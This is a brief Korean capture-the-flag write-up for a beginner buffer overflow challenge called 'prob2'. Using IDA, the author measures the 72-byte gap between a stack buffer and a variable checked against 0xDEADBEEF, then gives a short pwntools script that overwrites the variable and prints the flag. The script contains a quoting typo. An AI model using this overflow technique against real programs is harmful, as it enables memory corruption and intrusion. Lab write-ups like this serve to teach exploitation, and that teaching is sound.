먼저 우분투에서 p.interactive()를 통해 혹시 텍스트가 나올까 기대해봤지만
아무것도 나오지 않았다. 바로 IDA를 켯다

근데 IDA를 키자마자.... 떡하니 flag{g00d_g00d_good}가 보였지만 그냥 못본척 하자



보아하니 배열 하나와 변수 2개가 있다.
배열은 char buf[72]이고 나머지 변수 2개는 정수 변수다.
정수 변수 2개를 순서대로 a,b라 해보자

IDA를 통해 어셈블리를 보면
read할 때 rbp+buf = rbp-0x50의 값을 가져오고
아래에서 cmp에 보면 rbp+var_8 = rbp-8이다. 0x50=80이므로 두 변수 사이엔
72바이트가 있다.

cmp에 보면 0xDEADBEEF와 비교하고 있는 것을 알 수 있다.

코드를 짜보자

------------------------

from pwn import *

p=process(./prob2")

d = b'A'*72
d += p64(0x0DEADBEEF) #데드비프??

p.sendline(d)
p.interactive()

-------------------------

이렇게 넣어보면 flag{g00d_g00d_good} 가 나온다!!!